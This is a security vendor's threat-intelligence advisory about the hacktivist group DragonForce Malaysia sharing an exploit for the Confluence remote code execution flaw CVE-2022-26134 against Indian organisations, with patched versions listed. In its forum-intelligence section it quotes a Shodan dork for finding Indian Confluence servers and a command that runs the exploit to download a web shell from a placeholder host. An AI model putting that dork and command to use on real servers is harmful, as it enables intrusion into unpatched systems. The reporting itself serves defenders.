Hacktivist Group DragonForce Actively Targeting Indian Entities, Shares an Exploit for a Critical Confluence Server Vulnerability CVE-2022-26134

XVigil identified a post on a Telegram channel where the hacktivist group, DragonForce Malaysia has shared an exploit to CVE-2022-26134 to actively target and exploit Indian entities.
Updated on
April 19, 2023
Published on
July 15, 2022
Subscribe to the latest industry news, threats and resources.
Category: Adversary Intelligence Threat Type: Latest Attack Motivation: Hacktivist Region: India Source*: D4

Executive Summary

  • DragonForce Malaysia, the hacktivist group actively involved in targeting Indian entities, announced and shared the exploit CVE-2022-26134 which is a Confluence Server vulnerability.
  • The group has also shared a list of dorks targeting the Indian region on their Telegram channel.
  • Actors can scan the internet for vulnerable instances of Confluence servers and leverage this vulnerability to launch attacks against significant Indian entities owned by both the government and private sectors.
  • Look for patches and workarounds for the CVE-2022-26134.
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.
CloudSEK’s contextual AI digital risk platform XVigil identified a post on a Telegram channel where the hacktivist group, DragonForce Malaysia has shared an exploit to CVE-2022-26134 to actively target and exploit Indian entities. CVE-2022-26134 is a critical unauthenticated remote code execution vulnerability present in Confluence Server and Data Center. DragonForce posting updates on their Telegram channel

Analysis and Attribution

Information from Cybercrime Forums

  • On 21 June 2022, a threat actor published a post on a cybercrime forum, mentioning a PoC (Proof of Concept) for the exploit along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.
Shodan Dork: http.favicon.hash:-305179312 country:"IN"
  • The actor also shared a GitHub repository containing the script which can be downloaded and exploited using the following python command:
CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php
  • Later that day, DragonForce Malaysia was seen sharing this exploit to all of their 152,257 subscribers on their Telegram channel.
  • A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
[caption id="attachment_20026" align="aligncenter" width="1350"]Cybercrime forum post discussing CVE-2022-26134 Cybercrime forum post discussing CVE-2022-26134[/caption]  

About DragonForce

  • On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
  • The group’s primary objective of the attack, as claimed by them, was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
  • The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
  • This group owns and operates a forum where they post announcements and discuss their latest activities.
  • The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
  • The group has been conducting regular recruitment and promotion campaigns using Tiktok and Instagram reels.

DragonForce’s Official Communication Channels

Forum : https[:]//dragonforce[.]io
Radio : https[:]//radio[.]dragonforce[.]io
Facebook : https[:]//fb[.]me/dragonforcedotio
Telegram : https[:]//t[.]me/dragonforceio
Twitter : https[:]//twitter[.]com/dragonforceio
Instagram : https[:]//instagram[.]com/dragonforceio
YouTube : https[:]//www.youtube[.]com/channel/UC9GycRXuy7-WMULPBkBp4Bw

Information from OSINT

  • Based on the information from the open web, CloudSEK researchers could identify that as of 4 June 2022 at least 23 unique IPs were exploiting this vulnerability.
  • A Shodan search showed that there are at least 9,396 publicly reachable instances of Confluence on the internet.
[caption id="attachment_20027" align="aligncenter" width="316"]Source: Shodan Source: Shodan[/caption]  
  • The data from Cloudflare indicates that this vulnerability is being exploited by multiple sources on a large scale.
[caption id="attachment_20028" align="aligncenter" width="1274"]Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare) Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare)[/caption]  

Impact & Mitigation

Impact Mitigation
  • DragonForce is associated with multiple hacktivist groups for their campaign against Indian entities. This exploit gives them more opportunities to deface and dump the database of Indian entities.
  • Attackers can use this vulnerability to execute commands remotely.
  • Threat actors can leverage this opportunity to target victims and deploy ransomware.
  • Potential loss of revenue, reputation, and intellectual property.
  • The Confluence Server and Data Center versions need to be updated to the following patched versions:
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.



Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Dashboard mockup
Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.
Trusted by 400+ Top organisations